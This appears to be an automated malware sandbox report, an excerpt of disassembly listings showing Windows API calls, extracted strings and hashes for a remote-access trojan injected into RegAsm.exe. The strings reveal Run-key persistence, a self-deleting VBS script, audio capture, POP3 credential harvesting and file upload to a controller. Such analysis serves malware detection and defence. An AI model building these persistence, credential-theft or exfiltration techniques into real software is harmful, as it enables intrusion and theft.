                      • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                      • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                      • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                      APIs
                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CB58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                      • ExitProcess.KERNEL32 ref: 0040D419
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                      • API String ID: 3797177996-2557013105
                      • Opcode ID: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                      • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                      • Opcode Fuzzy Hash: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                      • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                      • ExitProcess.KERNEL32(00000000), ref: 004124A0
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                      • CloseHandle.KERNEL32(00000000), ref: 0041253B
                      • GetCurrentProcessId.KERNEL32 ref: 00412541
                      • PathFileExistsW.SHLWAPI(?), ref: 00412572
                      • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                      • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                      • Sleep.KERNEL32(000001F4), ref: 00412682
                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                      • CloseHandle.KERNEL32(00000000), ref: 004126A9
                      • GetCurrentProcessId.KERNEL32 ref: 004126AF
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                      • API String ID: 2649220323-436679193
                      • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                      • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                      • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                      • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                      APIs
                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                      • SetEvent.KERNEL32 ref: 0041B219
                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                      • CloseHandle.KERNEL32 ref: 0041B23A
                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                      • API String ID: 738084811-2094122233
                      • Opcode ID: 915ea97425a421c3b0b360962332b058f157651fe3be4e3934032a8821c14c71
                      • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                      • Opcode Fuzzy Hash: 915ea97425a421c3b0b360962332b058f157651fe3be4e3934032a8821c14c71
                      • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                      APIs
                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                      • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                      • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                      • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Write$Create
                      • String ID: RIFF$WAVE$data$fmt
                      • API String ID: 1602526932-4212202414
                      • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                      • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                      • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                      • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                      • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                      • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                      • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                      • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                      • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                      • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                      • API String ID: 1646373207-255920310
                      • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                      • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                      • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                      • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                      APIs
                        • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                        • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                        • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                      • _strlen.LIBCMT ref: 10001855
                      • _strlen.LIBCMT ref: 10001869
                      • _strlen.LIBCMT ref: 1000188B
                      • _strlen.LIBCMT ref: 100018AE
                      • _strlen.LIBCMT ref: 100018C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _strlen$File$CopyCreateDelete
                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                      • API String ID: 3296212668-3023110444
                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                      APIs
                      • _wcslen.LIBCMT ref: 0040CE07
                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                      • _wcslen.LIBCMT ref: 0040CEE6
                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                      • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CF84
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                      • _wcslen.LIBCMT ref: 0040CFC6
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                      • ExitProcess.KERNEL32 ref: 0040D062
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                      • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                      • API String ID: 1579085052-2309681474
                      • Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                      • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                      • Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                      • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                      APIs
                      • lstrlenW.KERNEL32(?), ref: 0041C036
                      • _memcmp.LIBVCRUNTIME ref: 0041C04E
                      • lstrlenW.KERNEL32(?), ref: 0041C067
                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                      • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                      • _wcslen.LIBCMT ref: 0041C13B
                      • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                      • GetLastError.KERNEL32 ref: 0041C173
                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                      • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                      • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                      • GetLastError.KERNEL32 ref: 0041C1D0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                      • String ID: ?
                      • API String ID: 3941738427-1684325040
                      • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                      • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                      • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                      • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %m$~$Gon~$~F@7$~dra
                      • API String ID: 4218353326-230879103
                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$EnvironmentVariable$_wcschr
                      • String ID:
                      • API String ID: 3899193279-0
                      • Opcode ID: df1e41f37c8dca98960d7f4fb97a4b833bbe2547b351ef0b21b83450724b43bb
                      • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                      • Opcode Fuzzy Hash: df1e41f37c8dca98960d7f4fb97a4b833bbe2547b351ef0b21b83450724b43bb
                      • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                      APIs
                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                      • LoadLibraryA.KERNEL32(?), ref: 00414E17
                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                      • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                      • LoadLibraryA.KERNEL32(?), ref: 00414E76
                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                      • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                      • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Library$AddressFreeProc$Load$DirectorySystem
                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                      • API String ID: 2490988753-744132762
                      • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                      • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                      • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                      • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                      APIs
                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                      • GetCursorPos.USER32(?), ref: 0041D5E9
                      • SetForegroundWindow.USER32(?), ref: 0041D5F2
                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                      • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                      • ExitProcess.KERNEL32 ref: 0041D665
                      • CreatePopupMenu.USER32 ref: 0041D66B
                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                      • String ID: Close
                      • API String ID: 1657328048-3535843008
                      • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                      • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                      • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                      • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$Info
                      • String ID:
                      • API String ID: 2509303402-0
                      • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                      • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                      • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                      • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                      • __aulldiv.LIBCMT ref: 00408D4D
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                      • CloseHandle.KERNEL32(00000000), ref: 00408F64
                      • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                      • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                      • API String ID: 3086580692-2582957567
                      • Opcode ID: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                      • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                      • Opcode Fuzzy Hash: fab45d6a79c9ac0bf1655f247f025cadc321dba09b469fb01c23ef7c289d3ac7
                      • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 0045130A
                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                        • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                        • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                        • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                      • _free.LIBCMT ref: 004512FF
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • _free.LIBCMT ref: 00451321
                      • _free.LIBCMT ref: 00451336
                      • _free.LIBCMT ref: 00451341
                      • _free.LIBCMT ref: 00451363
                      • _free.LIBCMT ref: 00451376
                      • _free.LIBCMT ref: 00451384
                      • _free.LIBCMT ref: 0045138F
                      • _free.LIBCMT ref: 004513C7
                      • _free.LIBCMT ref: 004513CE
                      • _free.LIBCMT ref: 004513EB
                      • _free.LIBCMT ref: 00451403
                      Memory Dump Source
